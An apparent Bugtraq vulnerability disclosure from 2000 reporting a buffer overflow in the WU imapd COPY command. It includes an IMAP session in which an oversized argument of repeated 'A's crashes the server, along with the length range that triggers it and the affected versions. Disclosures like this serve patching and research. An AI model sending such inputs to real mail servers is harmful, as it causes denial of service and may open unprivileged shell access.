Date: Fri, 21 Apr 2000 02:12:18 +0200 From: Michal Szymanski <siva9@CLICO.PL> Subject: another WU imapd buffer overflow To: BUGTRAQ@SECURITYFOCUS.COM Hi, While doing code security audit, I discovered another buffer overflow in imapd. This time security flaw exist in standard rfc 1064 COPY command: * OK mail IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * select inbox * 2 EXISTS * 0 RECENT * OK [UIDVALIDITY 956162550] UID validity status * OK [UIDNEXT 5] Predicted next UID * FLAGS (\Answered \Flagged \Deleted \Draft \Seen) * OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent * flags * OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9 * OK [READ-WRITE] SELECT completed * copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's] No answer. Process has been killed by SIGSEGV. Number of A's must be in range from 1017 to 8180. After LOGIN all privileges are dropped, but we still have possibility to get unprivileged shell access. I've tested it against WU imapd v10.223, v11.241, v12.250, v12.261, and v12.264. Regards, Michal Szymanski [michal_szymanski@linux.com.pl];